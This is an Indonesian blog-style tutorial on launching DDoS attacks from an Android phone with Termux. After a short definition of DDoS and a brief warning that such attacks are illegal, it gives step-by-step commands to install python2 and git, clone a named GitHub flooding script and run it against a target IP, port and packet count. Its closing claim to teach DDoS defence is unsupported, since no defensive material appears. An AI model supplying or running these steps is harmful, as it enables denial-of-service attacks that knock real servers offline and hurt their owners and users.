Cara DDos Attack Dengan Termux Terbaru No Root
apa itu DDoS. Serangan DDoS (Distributed Denial of Service) adalah jenis serangan siber di mana sekelompok komputer yang terinfeksi atau terkompromi menyerang satu sistem atau server. Serangan ini bertujuan untuk membuat server tersebut tidak dapat diakses oleh pengguna yang sah, karena server tersebut sudah terlalu sibuk menangani permintaan dari komputer-komputer yang terinfeksi tersebut. 

Serangan DDoS dapat menyebabkan kerugian finansial dan reputasi yang besar bagi korban serangan, terutama jika server tersebut merupakan bagian dari infrastruktur penting suatu organisasi atau lembaga. Oleh karena itu, sangat penting bagi setiap organisasi atau perusahaan untuk memiliki sistem pertahanan yang kuat terhadap jenis serangan ini.

salah satu teknik serangan siber yang dilakukan dengan cara membanjiri sebuah server atau jaringan dengan lalu lintas internet yang sangat tinggi. Serangan ini bertujuan untuk membuat server atau jaringan menjadi tidak dapat diakses oleh pengguna yang sebenarnya.

DDOS Termux sendiri adalah salah satu aplikasi yang bisa digunakan untuk melakukan serangan DDOS. Aplikasi ini biasanya digunakan oleh para hacker atau penyerang siber yang ingin mencoba melakukan serangan DDOS tanpa menggunakan komputer atau laptop. Dengan menggunakan DDOS Termux, mereka bisa melakukan serangan DDOS melalui smartphone Android yang mereka miliki.

Namun, perlu diingat bahwa melakukan serangan DDOS adalah ilegal dan bisa membahayakan banyak orang. Oleh karena itu, sebaiknya tidak mencoba melakukan serangan DDOS menggunakan aplikasi seperti DDOS Termux. Sebaliknya, kita harus selalu memperhatikan keamanan jaringan kita sendiri dan juga menghindari melakukan tindakan yang merugikan orang lain melalui internet.

Cara DDOS Dengan LiteDDOS Di Termux

1. pertama seperti biasa update repo!
$apt update && apt upgrade

2. install python versi ke 2 untuk menjalankan script Lite DDoSnya
$pkg install python2

3. jangan lupa juga install git untuk cloning script ddos dari github
$pkg install git

4. kemudian cloning script dari github melalui link berikut
$git clone https://github.com/4L13199/LITEDDOS

untuk melakukan serangan ddos menggunakan Lite DDoS, ketikan perintah berikut.
masuk ke direktori Litte DDOS
$cd LITEDDOS

selanjutnya jalankan dengan sintaks
$python2 LITEDDOS.py [ip target] [port] [jumlah ping]
Nah itulah caranya ddos attack menggunakan termux di android, dan juga script termux ddos attack dengan android. semoga dengan artikel ini kita lebih tau mengenai apa itu ddos attack, efek nya kepada web dan juga cara menangani ddos attack.